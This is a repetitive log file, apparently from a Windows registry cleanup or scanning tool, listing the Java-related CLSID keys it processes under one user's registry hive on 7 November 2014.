[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0005-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0006-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0007-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0008-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0009-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0010-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0011-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0012-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0013-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0014-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0016-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0017-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0018-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0019-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0021-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0022-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0023-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0025-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0026-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0027-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0028-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0030-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0031-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0032-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0033-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0034-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0035-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0036-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0037-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0038-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0040-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0041-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0043-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0044-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0045-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0046-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0047-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0048-ABCDEFFEDCBC}]
